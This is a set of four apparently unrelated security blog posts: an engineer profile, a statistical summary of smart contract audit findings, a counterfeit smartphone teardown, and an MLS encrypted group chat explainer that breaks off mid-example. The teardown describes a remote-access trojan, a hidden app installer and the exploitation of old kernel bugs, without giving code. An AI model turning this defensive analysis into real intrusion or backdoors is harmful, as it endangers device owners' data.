A Day in the Life of Alessandro Gario, Senior Security Engineer

People interested in joining Trail of Bits often ask us what it’s like to work on the Engineering Services team. We felt that the best answer would be a profile of some of the talented individuals on our team, and let them describe their experiences at Trail of Bits in their own words.

Today, we’re featuring Alessandro Gario, a member of our Engineering Team who lives in Italy. Alessandro works on open-source projects implementing new functionalities, reducing technical debt and improving their performance overall.

unnamed

How did you end up at Trail of Bits?

I first learned of Trail of Bits in my Twitter feed. I was on the lookout for new opportunities, so I started sniffing around the company and learning about its many open-source projects. I began with McSema, a project for lifting compiled executables to LLVM IR. Originally, I just wanted to try out the software, but I wanted to talk to the developers so I ended up in the Empire Hacking slack, where Trail of Bits engineers answer questions about their open-source work. My main contributions on the project were to the CMake code, improving the build experience and implementing better dependency management.

Dan Guido (CEO, Trail of Bits) noticed my contributions to McSema, and happened to have an immediate need for someone to work on osquery issues, so he made me an offer. Dan sent me a contract to work on a single task, and I officially became a Trail of Bits contractor! I had so much fun; it was the first time I was allowed so much freedom in working on a project — both in when I could work, and how I could direct my own tasking.

My contract ended when I finished the osquery task. With more time on my hands, it was now the perfect opportunity to engage more with the community, and take on the bugfixes and feature requests submitted by the users. Eventually, Trail of Bits had received enough requests for osquery work that they sent me a full-time job offer, and the rest is history.

What projects are you working on currently?

Primarily I am involved with the osquery project, having dedicated so much of my time to it that I was accepted as a member of the five-person committee of maintainers! The project, and especially its build toolchain, is currently being renovated to operate independently of its old home at Facebook.

I also provide Qt SDK UI work for an internal project where we are creating a powerful source code navigation and cross-referencing utility for security auditors. Beyond that, I occasionally help out our other projects with their CMake-related issues.

On the side, I’ve continued to pursue experiments with how to fit eBPF into osquery, which is part of an ongoing effort to improve osquery’s event-driven detection capability on Linux. I recently spoke on this topic at QueryCon.

How do you schedule your workday?

When I don’t have to work alone, for any kind of collaboration I need to align my schedule with the rest of the team. Because of the time zone differences, I have to be flexible. If I were to stick to a strict 9am-6pm work shift, it wouldn’t really work. I organize my workday around my preferred schedule, but also that of the US-based Trail of Bits employees and customers who are 6 to 9 hours behind/earlier than me here in Italy. When it’s late afternoon in New York, it’s nighttime in Milan. Most of my meetings are around 5pm or 6pm my time, which suits me. It has never been a problem; I really like the schedule.

What are the most challenging aspects of your job?

Sometimes a task’s requirements, at least the way the task is initially envisioned, are hard to implement due to technical or design hard constraints. That’s difficult, because you have to find a creative compromise that works for everyone.

On rare occasions that I get stuck, I get the help of the team. Our Slack channels are like a mini StackOverflow website: you can just ask, and get immediate answers from experts. That is one of the great things about working here.

When contributing to any open-source project with external maintainers, you will eventually have to work with people outside the company to finish your job and get the work integrated into the next release. Sometimes, you have to work a little extra after you think the task is “finished,” because you still have to work with the upstream project to make everyone happy.

What is the most rewarding aspect of your work at Trail of Bits?

I was always interested in information security. I would look at Twitter and see all of these conferences, events, and people who were building great things. I am finally able to travel to these events and meet these people. I even gave my first conference talk last month, at QueryCon!

I am exposed to challenging issues that make me learn, especially when I get other people at the company involved. The ability to work with, and learn from, a talented group of experienced engineers is a reward in itself.

When I am given a task, I am trusted with the responsibility to see it through to the end, and work on it on my own. I do my best work and feel the most motivated when I am trusted this way.

What is some career advice for someone who wants to join us here?

Whenever I sought positions in the security engineering field, they seemed to be mostly for external pen-testing web services, which wasn’t particularly interesting to me. I’ve done a little bit of reverse-engineering and CTFs, but vulnerability research is not really my field either. I like to apply my engineering skills working on projects to build software. I’ve decided that you have to actively seek something that challenges and interests you, and carve out your own opportunity.

My advice is to find a relevant project you would like to support, and look for easy issues to solve, or even just review an open Pull Request, or improve the documentation. Once you get to know the project, it becomes easier to start contributing cool changes.

This is exactly what has worked for me personally. I know it is hard, because most people don’t have the time for after-hours work. And there’s no guarantee that you will get hired. But choose projects that are intrinsically motivating to you, and keep doing cool stuff as much as possible in your spare time. Have fun, and in the end you will get noticed.

The Engineering Services Team is Hiring

We appreciate Alessandro taking the time from his projects to talk about what it’s like to work here. Our Engineering Services Team is distributed around the globe, and each of our engineers brings a unique set of skills and contributions. Our work is public-facing, open-source, and client-driven. In close partnership with our customers, we are continuously working to extend and improve endpoint security solutions like osquery, Santa, and gVisor. Our recent work includes the implementation of 2FA support within PyPI, the Python package management system. We contribute to security event alerting pipeline projects like StreamAlert or the Carbon Black API, and are always working to improve our own security analysis tools like McSema and Remill. Our customers rely on us to solve their open-source security software challenges.

We are currently hiring for another Senior Security Engineer. Please apply if you are interested and feel you are qualified!

246 Findings From our Smart Contract Audits: An Executive Summary

Until now, smart contract security researchers (and developers) have been frustrated by limited information about the actual flaws that survive serious development efforts. That limitation increases the risk of making critical smart contracts vulnerable, misallocating resources for risk reduction, and missing opportunities to employ automated analysis tools. We’re changing that. Today, Trail of Bits is disclosing the aggregate data from every full smart contract security review we’ve ever done. The most surprising and impactful results we extracted from our analysis are:

  • Smart contract vulnerabilities are more like vulnerabilities in other systems than the literature would suggest.
  • A large portion (about 78%) of the most important flaws (those with severe consequences that are also easy to exploit) could probably by detected using automated static or dynamic analysis tools.
  • On the other hand, almost 50% of findings are not likely to ever be found by any automated tools, even if the state-of-the-art advances significantly.
  • Finally, manually produced unit tests, even extensive ones, likely offer either weak or, at worst, no protection against the flaws an expert auditor can find.

Continue reading this post for a summary of our study and more details on these results.

Everyone wants to prevent disastrous vulnerabilities in Ethereum smart contracts. Academic researchers have supported that effort by describing some categories of smart contract vulnerabilities. However, the research literature and most online discourse is usually focused on understanding a relatively small number of real-world exploits, typically with a bias towards the highly visible. For example, reentrancy bugs are widely discussed because they were responsible for the infamous DAO attack and are somewhat unique to smart contracts. However, is reentrancy the most common serious problem in real smart contracts? If we don’t know, then we cannot effectively allocate resources to preventing smart contract vulnerabilities. It’s not enough to understand detection techniques. We have to know how and where to apply them. Smart contracts are new. Decision makers have a relatively shallow pool of developer/analyst experience upon which to base their actions. Having real data to draw conclusions from is essential.

So, we collected the findings from the full final reports for twenty-three paid security audits of smart contract code we performed, five of which have been kept private. The public audit reports are available online, and make informative reading. We categorized all 246 smart-contract related findings from these reports, in some cases correcting the original audit categorization for consistency, and we considered the potential for both static and dynamic analysis tools, in the long-run, to detect each finding. We also compared the frequencies of categories to those for fifteen non-smart-contract audits we performed. Using paid, expert audits of code means our statistics aren’t overwhelmed by the large number of relatively silly contracts on the blockchain. Using many audit findings instead of a handful of exploited vulnerabilities gives us a better picture of potential problems to keep watch for in the future.

Category Frequencies are Different than Other Audits… But Not as Much as You’d Think

The most common type of smart contract finding is also the most common kind of finding in the 15 non-smart-contract audits we examined in order to compare smart contract and other kinds of audits: data validation flaws are extremely common in every setting, constituting 36% of smart contract findings, and 53% of non-smart contract findings. This is no surprise; accepting inputs that should be rejected, and lead to bad behavior, will always be easy to do, and always be dangerous. Access control is another common source of problems in smart contracts (10% of findings) and in other systems we audited (18%); it’s easy to accidentally be too permissive, and access control can also be disastrous if too restrictive (for example, when even the owner of a contract can’t perform critical maintenance tasks in some states, due to a contract bug).

Some categories of problems are much less common in smart contracts: unsurprisingly, denial of service, configuration, and cryptography issues are less frequent in a context where the blockchain abstracts away communication issues and operating system/platform-specific behavior changes, and gas limits reduce the temptation to roll your own cryptography. Data exposure problems are also less common in smart contracts; most developers seem to understand that data on the blockchain is inherently public, so there seem to be fewer misunderstandings about the consequences of “surprise” visibility. But these cases are somewhat unusual; for a majority of types of finding, including overflow/underflow and arithmetic precision, patching, authentication, timing, error reporting, and auditing and logging, the percentages in findings are within 10% of those for non-smart-contract audits.

The Worst of the Worst

In addition to counting how many findings there were in each category, we looked at how serious those findings tended to be; their potential severity, and the difficulty for an attacker to exploit them. We refer to the worst findings as high-low: high severity, low difficulty. These issues can allow an attacker to inflict major damage with relative ease.

Many of our twenty-two categories had no high-low findings, but a small number had high-low rates greater than 10%: access controls (25% high-low), authentication (25%), timing (25%), numerics (23%), undefined behavior (23%), data validation (11%) and patching (11%). Note that much-dreaded reentrancy, while often serious (50% of reentrancy findings were high severity) had no high-low findings at all, and accounted for only 4 of the 246 total findings.

Tools and Automation: We Can Do a Lot Better

For each finding, we determined, to the best of our knowledge, if it could potentially be detected by automated static analysis (e.g., our Slither tool), using a reasonable detector without too many false positives, or by automated dynamic analysis (e.g., with property-based testing like Echidna or symbolic execution like Manticore), either with off-the-shelf properties like standard ERC20 semantics, or using custom invariants. Rather than restricting ourselves to current tools, we looked to the future, and rated a finding as detectable if a tool that could be produced with significant engineering effort, but without unprecedented advances in the state-of-the-art in software analysis, could potentially find the problem. That is, we asked “could we write a tool that would find this, given time and money?” not “can current tools definitely find this?” Obviously, this is a somewhat subjective process, and our exact numbers should not be taken as definitive; however, we believe they are reasonable approximations, based on careful consideration of each individual finding, and our knowledge of the possibilities of automated tools.

Using this standard, 26% of the full set of findings could likely be detected using feasible static approaches, and 37% using dynamic methods (though usually only with the addition of a custom property to check). However, the potential for automated tools is much better when we restrict our attention to only the worst, high-low, findings. While static tools have less potential for detecting high-low findings than dynamic ones (33% vs. 63%), four of the high-low issues could probably only be detected by static analysis tools, which are also much easier to apply, and require less user effort. Combining both approaches, in the best-case scenario, would result in automatic detection of 21 of the 27 high-low findings: almost 78% of the most important findings. Our estimates of how effective static or dynamic analysis tools might be, in the limit, also vary widely by the kind of finding:

Category Dynamic Static
Access controls 50% 4%
API inconsistency 0% 0%
Auditing/logging 0% 38%
Authentication 25% 0%
Code quality 0% 67%
Coding bug 67% 50%
Configuration 0% 0%
Cryptography 0% 100%
Data exposure 0% 0%
Data validation 57% 22%
Denial of service 40% 0%
Documentation 0% 0%
Error reporting 29% 14%
Front-running 0% 0%
Logic 0% 0%
Missing logic 67% 0%
Numerics 46% 69%
Patching 17% 33%
Race condition 6% 59%
Reentrancy 75% 100%
Timing 50% 25%
Undefined behavior 0% 31%

Of course, in some cases, these percentages are not particularly informative; for instance, there was only one cryptography finding in our audit set, so it isn’t safe to assume that all cryptography bugs are easy to catch with a static analysis tool. Similarly, the coding bug category, containing what amount to “typos” in code, is likely to have an even higher percentage of easily statically detected problems, but there were only a handful of such problems in our audits.

Our best guess is that the combination of major impact on system behavior (thus high severity) and low difficulty (thus easy to find, in some sense) is not only a boon to would-be attackers, but a big help to automated analysis tools. That’s good news. Ongoing efforts to improve smart contract analysis tools are well worth the effort. That’s part of our motivation in releasing Crytic, a kind of Travis CI for smart contracts — with built-in support for running static analysis (including some Slither detectors not yet available in the public release) and, soon, dynamic analysis, on your code, automatically.

Perhaps the most important upshot here is that using high-quality automated static analysis is a best practice with almost no downside. If you’re writing important smart contracts, looking at a relatively small number of false positives in order to detect, with almost no developer effort, some of the most critical flaws is simply the right thing to do.

Tools and Automation: No Silver Bullet

However, a lot of the findings (almost 49%) are almost impossible to imagine detecting with a tool. In most of these cases, in fact, a tool isn’t even very likely to help. Slither’s code understanding features may assist in finding some issues, but many problems, and almost a quarter of the most important problems, require deeper understanding of the larger context of blockchains and markets. For example, tools can’t inform you about most front-running. Problems requiring human attention are not limited to the obvious categories, such as front-running, configuration, and documentation, either: there are 35 data validation findings, 12 access controls findings, and 10 undefined behavior findings, for example, that are unlikely to be detectable by automated tools – and 3 of these are high-low findings. A full 35% of high severity findings are unlikely to be detected automatically.

Even in the best of possible near-future automated tool worlds, and even with full formal verification (which might take up to 9x the developer effort), a great many problems simply require human attention. Security is a Strong-AI Hard problem. Until the robots replace us, independent expert attention will remain a key component of security for the most essential contracts.

Unit Tests are Great… But Maybe Not For This

Finally, what about unit testing? We didn’t add any unit tests during our audits, but we can look at whether the presence of significant unit tests was correlated with fewer findings during audits, or at least fewer high-low findings. The number of data points is, of course, too small to draw any solid conclusions, but we didn’t find any statistically significant correlation between our estimate of unit test quantity and quality and the presence of either findings in general or high-low findings. In fact, the insignificant relationships we did detect were in the wrong direction: more unit tests means more problems (the positive relationship was at least weaker for high-low findings, which is comforting). We hope and believe that’s just noise, or the result of some confounding factor, such as a larger attack surface for more complex contracts. While our basis for this result is subject to a number of caveats, including our ability to gauge the quality of unit tests without examining each line of code in detail, we do believe that if there were a causal relationship between better unit tests and fewer audit findings, with a large and consistent effect size, we’d have seen better evidence for it than we did.

Obviously, this doesn’t mean you shouldn’t write unit tests! It means that the kinds of things attackers and auditors are looking for may not overlap significantly with the kinds of problems unit tests help you avoid. Unit testing can probably improve your development process and make your users happier, but it may not help you actually be much more secure. It’s widely known that the problems developers can imagine happening, and write unit tests to check for, do not often overlap with the problems that cause security vulnerabilities. That’s why fuzzing and property-based testing are so valuable.

One key point to take away here is that the bugs found by property-based testing can be added as new unit tests to your code, giving you the best of both worlds. The pyfakefs module for creating high-fidelity mock file systems in Python, originally developed at Google, was a widely used software system, with a fairly extensive set of well-written unit tests. However, using the TSTL property-based testing tool for Python revealed over 100 previously undetected problems in pyfakefs (all of which were fixed), and let the developers of pyfakefs add a large number of new, more powerful, unit tests to detect regressions and new bugs. The same workflow can be highly effective with a well-unit-tested smart contract and Echidna; in fact, it can be easier, because Echidna does a better job of automatically figuring out the public interface to a contract than most property-based testing tools do when interacting with a library API.

Stay Tuned for More Details

We’ll be publishing the full results after we add a few more of our own smaller-scale audits and validate our results by comparing to estimates for audits performed by other companies. In the meantime, use our preliminary results to inform your own thinking about defects in smart contracts.

From The Depths Of Counterfeit Smartphones

In an age of online second-hand retailers, marketplace exchanges, and third-party refurb shops, it’s easier than ever to save hundreds of dollars when buying a phone. These channels provide an appealing alternative for people foregoing a retail shopping experience for a hefty discount.

However, there is an additional option for those bargain hunters seeking even more savings: counterfeits of popular phone models. These knock-offs have become a burgeoning industry, transforming cheap hardware and free software into mass profits at almost no cost to the manufacturers. These clones often sell at under 1/10th of the retail price and are often very convincing replicas at first glance.

Last year, we helped Motherboard Vice with an investigative teardown of a counterfeit iPhone X. We were haunted by the many security concerns and vulnerabilities we’d discovered, so we worked with DeviceAssure—a company dedicated to anti-counterfeit solutions for mobile platform—to do a deeper dive into these dangerous duplicates.

This post details what we found and provides some insight into exactly what you are getting when you use one of these phones. Whether it’s intentional malice or just dangerous ineptitude, there is plenty to be concerned about!

First Impressions

We looked at two counterfeits: an iPhone 6 and a Samsung S10.

Front and back of the counterfeit iPhone

Front and back of counterfeit Samsung S10

The visual aesthetic of the devices are very convincing. Proper attention to peripheral layout, dimensions, and overall finish is almost identical to their retail counterparts. The various switches and buttons correspond to what you would expect in the real devices to control the phone lock, adjust the volume, and turn them on and off. The counterfeit iPhone even uses a lightning cable in its charge port!

Both models are equipped with haptic feedback and fingerprint sensors that do indeed work … mostly. Facial biometrics are also included, though they had a considerably higher failure rate and would often not work at all.

From an initial glance at the underlying guts, both devices rely on controllers from Mediatek, a Chinese hardware company that provides an ARM chipset for embedded devices that is both incredibly cheap and reasonably capable. They also rely, as many counterfeits do, on custom, largely community-built ROMs of the Android runtime—a telltale sign that functionality will be non-standard and rife with one of hundreds of variant-specific quirks.

The Good – They look and work somewhat like the real thing… sometimes

You get a phone that looks and works vaguely like the one it counterfeited, with a few exceptions. What’s good other than that?

Nothing.

No really, even if these devices had hypothetically sported pristine ROMs (which, hint: they didn’t), they still came with a slew of critical problems, even if they weren’t outright backdoored with preinstalled malware (which, hint: they were).

We can give a C+ for effort to some of the detail rendered into the system UI. A good majority of modal popups and panel settings are faithfully intercepted and recreated using extensions to the native resource framework.

In particular, the Samsung counterfeit uses the native launcher, UI/Icon pack, and theming engine for its variant of Android; it is almost indistinguishable from the original. It even includes legitimate portals for both Samsung and Google play app stores.

The iPhone, however, quickly falls apart after minutes of exploration. The ROM system layer initially presents a believable iOS UI, but edge cases in event behaviors (WiFi connection errors, application exceptions, certain input text types, etc.) reveal stock Android screens. In addition, the “iOS” apps all displayed in noticeably low resolution and contain creatively broken english (in stark contrast to the ROM system layer, suggesting separate authors).

The Bad – They are full of unpatched vulnerabilities and insecure bloatware

Both phones report running the latest version of Android Pie 9.0; a relatively hardened OS in most regards. However, it’s not true.

In the case of the iPhone, further digging revealed that it runs a far older version of Android: Kitkat 4.4.0. Kitkat’s last update came in 2014. As you can imagine, hundreds of CVEs have appeared since then, not to mention inherent design flaws that have since been reworked: sandbox mechanisms, file system partitions, and dangerous permission APIs to name a few.

We probed a few well-known weaknesses and confirmed they were unpatched. The device is susceptible to the notorious Stagefright bugs which exploit media processing in the SMS/MMS messages to gain remote control of the device. In addition, several vulnerabilities in old Android system daemons, including the Mediaserver and Surfaceflinger, exhibited unpatched functionality. Because these AOSP ROMs are compiled out-of-band and maintained ad-hoc in the depths of board-hacking and system-modding forums, it is unlikely that users could ever patch these for themselves. There is certainly no over-the-air upgrade capability.

The S10 runs a slightly newer Android: Lollipop 5.1. Last updated in 2015, Lollipop replaced the Dalvik VM with the modern ART VM, and added Material UI theming elements thus allowing our counterfeit to use the Samsung UI components.

However, there is an even more serious problem that plagues both phones: outdated kernels. In addition to the Android runtime updates, the Linux kernel in Android phones often requires vendor participation to downstream security fixes onto the phone. Even in legitimate Android devices, this process often lags behind security releases and requires additional engineering effort by the vendor. The volunteer community of Mediatek ROM maintainers aren’t going to keep up with daily security updates, so outdated kernels in counterfeits are inevitable. Both phones had vulnerable kernels that were successfully exploited by known bugs, like DirtyCow (a copy-on-write memory race condition) and Towelroot (Futex timing bug ported to Android). No doubt a wide host of other kernel bugs are available for a potential attacker to abuse.

The Mediatek device drivers and daemons are a source of abundant vulnerabilities as well, often leading to kernel-level execution. Again, the ability or likelihood that a user would be able to appropriately find and patch these systems is highly unlikely.

Another pitfall of these phones is the presence of debug and testing utilities that expose dangerous system-level permissions in the Mediatek baseline ROM packages. This was observed on both of these devices, as well as on multiple other counterfeit variants we’ve researched. The Galaxy S10 counterfeit features a remote debugging server that allows remote control over media files, logging SMS messages, and deleting phone numbers.

The Mediatek Android daemon (MTKAndroidSuite package) on the Galaxy S10 counterfeit starts a local FTP server that can be used to manipulate files due to the elevated permissions of the service.

Still on the S10, incoming SMS’ are saved to the application’s SQLite database, which is not protected by access controls and can be read by other applications.

An overview displaying some of the Mediatek daemon capabilities (as indicated via class filenames) shows that the daemon can also retrieve media files, dump phone contacts, delete messages from the phone, and more.

These counterfeits are undeniably insecure. Both lie about their Android versions. The ROM versions used were severely outdated and vulnerable to public exploits, as were their kernels. They include bloatware, like remote debugging services, that enable abuse. This is what you’d expect from a phone that’s built around a volunteer-maintained, outdated Android ROM.

The ability for vendors and developers to seamlessly integrate and enforce security updates across their devices has been a massive win for mobile security. This requires a larger ecosystem that extends beyond the phone itself. Not only are these clones lacking in the latest and greatest hardware mitigations, but being isolated from the larger ecosystem and its security safety net is an inherent risk that can never truly be mitigated by these knockoffs.

The Ugly – They contain malware and rootkits

Both the Galaxy S10 and iPhone 6 counterfeits we assessed contained malware and rootkits.

The first issue we noticed in both devices was the presence of Umeng, an invasive analytics library, embedded into many of the applications and system libraries. Based out of China, Umeng has been caught employing malware in their operations. It collects and sends user information, including name, gender, IMEI numbers, serials, and more, back to their servers regularly without prompting any of the usual permission-consent disclaimers.

In the case of the S10, we found the SystemUI framework was modified to embed a server that can arbitrarily download, install, and run .dex files, in addition to reporting event information collected from system events such as geolocation, contact creation, and package installation and removal. For example, the library components used for facial recognition came bundled with functionality that can install arbitrary Android applications on demand.

On the S10, a hidden component in the SystemUI downloads files off the internet in the background. Note the Mandarin logs at the bottom of the screenshot!

Monitoring the S10’s network activity, we found it periodically reaching out to an unknown server. This is the origin of those requests, found embedded inside the SystemUI framework library.

One example of a component that has the capability to install additional applications on-demand in the facial recognition software. “ReadFace” is a third-party library, integrated inside the SystemUI framework, that seems to simulate biometric facial recognition. Within this code, it seems that there is the ability to arbitrarily install APKs.

Finally, the S10 included a RAT masquerading as a font extension system service (“LovelyFonts”) that allows for remote native code execution, complete with a shell, arbitrary file upload/download, and logging of system events. This RAT provides unlimited access to the person who planted it there, enabling total compromise of the phone and all its data. We observed that certain events, such as installing packages or sending text messages, would trigger connections to exchange encrypted payloads remotely related to this backdoor. As a note, while this specific malware wasn’t present on the particular iPhone 6 that we studied, we have encountered variants of it on other counterfeit iPhone ROMs in the past.

This is a function inside the Lovelyfonts library that invokes a direct system call. The Lovelyfonts service comes with a library that allows a remote user to execute code directly on the machine, bypassing the Android Runtime.

Here, the malware is saying that it’s trying to instantiate a “network interceptor,” ostensibly interfering with network traffic.

The RAT malware detects whenever an app is installed or uninstalled and generates an encrypted payload to send to a remote API server.

Insecure, outdated ROMs are bad. Actual evidence of malicious intent is ugly. The phones we looked at both had Umeng, a known invasive analytics library that steals user data, embedded in multiple applications. The S10 had a server embedded in the SystemUI framework that can download, install, and run applications, and collect system data, and it had malware that grants unlimited access to the device to whoever planted it there.

The moral of the story? If you’re using counterfeit phones, there’s a high likelihood that it will provide bad actors access to your data by design. Embedding malware here is easy. It is trivial for a counterfeit manufacturer to implant and modify the ROM before distribution. Tracking or detecting either action is impossible for most users. While it is theoretically possible to find a ‘clean’ distribution, it is a gamble to make, never mind the inherent risk of using an insecure baseline system.

Conclusion – If you used one of these phones, you’d already be hacked

As the price point for handheld devices continues to climb, there will always be a temptation to seek cheaper alternatives. Counterfeit smartphones will continue to evolve in sophistication, performance, and threat to users. Using them puts your data at risk and may enable abuse of the applications and networks that you access and use.

Often times, it’s not obvious to buyers that they’re purchasing counterfeits. Fake versions like these are often acquired through Craigslist or other 3rd parties. Some are sold as scam upgrades or gifts. In some countries, it can be difficult to determine genuine sellers from counterfeit vendors because all phones are purchased independently from cellular contracts. Buying direct from Apple or Samsung is the best way to ensure nothing malicious comes preinstalled on your phone, and enables you to receive new software updates that patch security issues (well, at least theoretically). If you’re a company that allows employees to access corporate data on their phones, consider verifying devices for genuine software.

We hope that this investigation helped illuminate the dangers of opting into an “off-brand” device. If this was helpful, or sounds similar to a security concern you or your organization confront, reach out! We offer a wide range of services, including iVerify – a personal security app for iOS – for further securing your phone.

We’d like to again thank DeviceAssure for reaching out and providing us with the hardware to conduct this analysis as well as the opportunity to do some digging into this matter. They will be at Blackhat this year and so will some of us, so stop by and say hi. And as always, we love to hear about weird and strange products out there in the wild, so drop a line if there is something you think we should look at!

Better Encrypted Group Chat

Broadly, an end-to-end encrypted messaging protocol is one that ensures that only the participants in a conversation, and no intermediate servers, routers, or relay systems, can read and write messages. An end-to-end encrypted group messaging protocol is one that ensures this for all participants in a conversation of three or more people.

End-to-end encrypted group messaging is a necessary problem to solve. Whether it be for limiting liability, providing verifiable client-side security, or removing a single point of failure, there are good reasons for a group messaging host to use an end-to-end encrypted protocol.

End-to-end encrypted group messaging is also a hard problem to solve. Existing solutions such as Signal, WhatsApp, and iMessage have inherent problems with scaling, which I’ll discuss in detail, that make it infeasible to conduct group chats of more than a few hundred people. The Message Layer Security (MLS) protocol aims to make end-to-end encrypted group chat more efficient while still providing security guarantees like forward secrecy and post-compromise security.1

To these ends, I’ve been working on molasses, a Rust implementation of MLS, designed with safety, ease-of-use, and difficulty-of-misuse in mind.

Molasses has helped refine the MLS spec

The primary contribution of molasses has been in detecting errors in the specification and other implementations through unit and interoperability testing. Molasses implements most of MLS draft 6. Why not all of draft 6? There was an error in the spec that made it impossible for members to be added to any group. This broke all the unit tests that create non-trivial groups. Errors like this are hard to catch just by reading the spec; they require some amount of automated digging. Once they are found, the necessary revisions tend to be pretty obvious, and they are swiftly incorporated into the subsequent draft.

Iterating this discovery/patching process using molasses has given me a chance to put the spec through its paces and help make things clearer. This winter internship (“winternship”) project has been a great experience, especially as a first-time IETF contributor.

How to build encrypted group chat

In this section we derive why MLS is constructed the way it is (hint: for efficiency reasons), and how it compares to other solutions (hint: it’s better).

First off, MLS works on a lower level than most chat applications. It is a protocol upon which applications can be built. For example, MLS does not govern group permissions such as who can add people to the chat — this would be done by an application using MLS under the hood). Thus, we can leave things like formal rule systems out of the conversation entirely when analyzing the protocol. Here, we’re only going to consider the sending of messages and the removal of members.

The following section makes use of cryptographic primitives such as digital signatures, Diffie-Hellman key exchange, (a)symmetric encryption, and key-derivation functions. If the reader feels underprepared in any of these areas, a quick skim of the sections in Serious Cryptography on ECIES and Authenticated Diffie-Hellman should be sufficient.

Without further ado,

A Motivating Problem

Wilna is planning a retirement party for an acquaintance, Vince. The logistics are a nightmare, so she invites her friends Xavier, Yolanda, and Zayne to help her plan. They would like to make a group chat on Slack so they can all stay on the same page, but they remember that Vince is an infrastructure manager for Slack—he can see all the messages sent over any Slack server in the world. This is a problem, since they want to give Vince a nice long vacation upstate and they want it to be a surprise. Vince’s position poses even more problems: he happens to manage every single server in town. Even if Wilna purchases her own server to mediate the group chat, Vince will be tasked with managing it, meaning that he can read everything the server stores.

What Wilna needs is a centralized end-to-end encrypted group chat, i.e., a group chat where every member can broadcast messages and read all incoming messages, but the single server that mediates these messages cannot read anything. For clarity, we’ll distinguish between application messages, which carry the textual content of what a group member wants to say to everyone else in the group, and auxiliary messages (called “Handshake messages” in MLS), which members use to manage group membership and cryptographic secrets. Since this is all mediated through one server, the members can rely on the server to broadcast their messages to the rest of the group.

With the setup out of the way, what are the options?

Solution #1: Pairwise Channels

Suppose Wilna, Xavier, Yolanda, and Zayne all know each other’s public keys for digital signatures. This means that each pair of people can do an authenticated Diffie-Hellman key exchange over some auxiliary messages and derive a shared symmetric key called the pair key. This process produces six separate pairwise channels, represented here:

If Wilna wants to send an application message m to the group, she has to encrypt it three separate times (once for each member of the group) and send all the ciphertexts:

The grey arrows represent application messages encrypted under a symmetric key.

Note that Wilna isn’t making use of the server’s ability to broadcast messages, since each member in the group can only decrypt messages encrypted under their own pair keys. Generalizing this, if there is a group of size N, sending an application message requires a member to encrypt and send N-1 times. Roughly speaking, this is how iMessage does group chat.2

Great, so that’s just three encryptions per person. This probably takes at most a few milliseconds on a phone. What’s the issue? The issue is what about the WhatsApp group with >10,000 members where my aunts talk about who’s getting married next? Do you want them to do 9,999 encryptions every time they send something? I do, but they probably don’t. To accommodate my aunts, we need to get cleverer.

Solution #2: Sender Keys

Instead of having a key between every user in the group, let’s give every user a sender key that they use to encrypt application messages. This is roughly what Signal2, WhatsApp2, and Keybase do. If you’re a group member, you have to go through the following setup:

  1. Randomly generate your sender key
  2. For every user in the group, encrypt your sender key with your pair key that you share with that user
  3. Send every user their encrypted copy of your sender key as an auxiliary message

After the setup, which requires N-1 encryptions for each user in a group of size N (that’s Θ(N2) total auxiliary messages), we finally see some efficient behavior. To send an application message m, Wilna:

  1. Encrypts m with her sender key precisely once
  2. Broadcasts the ciphertext to the group

The grey arrows represent application messages encrypted under a symmetric key.

The grey arrows represent application messages encrypted under a symmetric key.

Although there are three arrows here, they are all the same ciphertext, so the application message only needs to be encrypted and broadcast once. Thus, after the setup phase, each outgoing application message only costs a single encryption. So we’re done, right? Wrong, of course wrong. Because…

What about Removal?

The fallacy here is that the setup phase runs once. It actually runs every time the group is modified. Suppose in the process of premeditating this “retirement party,” the group finds out that Zayne has been leaking details to Vince the whole time. Naturally, they kick Zayne out. Now Zayne still knows all the sender keys, so if he talks to Vince and gets an encrypted transcript of the group conversation that happened after his departure, he would still be able to decrypt it. This is a no-no, since Zayne has already defected. To prevent this from happening, each remaining user in the group has to create a new sender key and share it with everyone else through their pairwise channels. Again, this is Θ(N2) total auxiliary messages, which can be a lot. So if we want to tolerate tons of group modifications,3 we’re going to have to find a way to bring down the number of auxiliary messages sent during the setup phase, while still being able to keep using sender keys for application messages. A well-known secret in computer science is that when the naïve solutions of pairs and lists don’t work, there’s a next logical step:

Solution #3: Trees

We would like to have sender keys (since they make application messages efficient). We also want to be able to transmit new sender keys to subsets of the group without using too many auxiliary messages. The important insight here is that, when we remove a member, we shouldn’t need to individually send new keying information to every single remaining member like we had to in the previous solution. After all, we need to send this to the whole group minus just one person. So why not have public keys that cover large subsets of the group, and use those for sending auxiliary messages? This is exactly what the MLS ratchet tree (a.k.a. TreeKEM) affords us.

The MLS ratchet tree is a binary tree4 whose leaves correspond to members of the group, and whose non-leaf nodes, called intermediate nodes, carry a Diffie-Hellman public key and private key. Intermediate nodes don’t represent people, computers, or locations on a network; they’re just pieces of data that facilitate auxiliary message sending. We also allow nodes to be blank, meaning that they do not have an associated keypair. A node that does have an associated keypair is said to be filled. Every member in the group retains a copy of the ratchet tree, minus the private keys. Knowledge of the private keys follows the ratchet tree property:

Ratchet Tree Property If a member M is a descendant of intermediate node N, then M knows the private key of N.

*deep breath* Sender keys are derived via key-derivation function (KDF) from the root node’s private key, and private keys are derived via KDF from its most-recently updated child’s private key.5 Upon the removal of a user, new private keys are distributed to the resolutions of the copath nodes, i.e, the maximal non-blank nodes of the subtrees whose root is the sibling of an updated node.

That paragraph alone took about 10 minutes to write, so let’s just see…

A Small Example

We start off with a group like so:

Zayne wants out, so Yolanda removes him.6 To remove him, Yolanda will first blank out Zayne and all his ancestors:

The boxes with red slashes through them represent blank nodes.

The boxes with red slashes through them represent blank nodes.

Yolanda needs to contribute new keying information to the new group so that the new sender keys can be derived from the new root’s private key. To do this, she generates a new personal keypair pubY’ and privY’ and derives all her ancestors’ keypairs by iteratively applying a KDF to the private key and computing its corresponding public key (this is called “ratcheting,” whence “ratchet tree”).

The green circles indicate recently updated nodes.

But Yolanda isn’t done. Wilna and Xavier need to be told about these new keys somehow. It’s Yolanda’s job to share this info. In particular,

  1. Every member needs to get a copy of the public keys of all updated nodes (i.e., Yolanda’s own public key and all her ancestors’). This is important. The public keys are part of the shared group state, and shared group state is how a bunch of values in the MLS protocol are derived.
  2. Every member needs to get a copy of the private keys of their nearest modified ancestor. This is in order to preserve the ratchet tree property.

Remember that the end goal is still to derive the sender keys, which means that Wilna and Xavier need to be told the value of the root private key, privY”’. This will be a consequence of item two above.

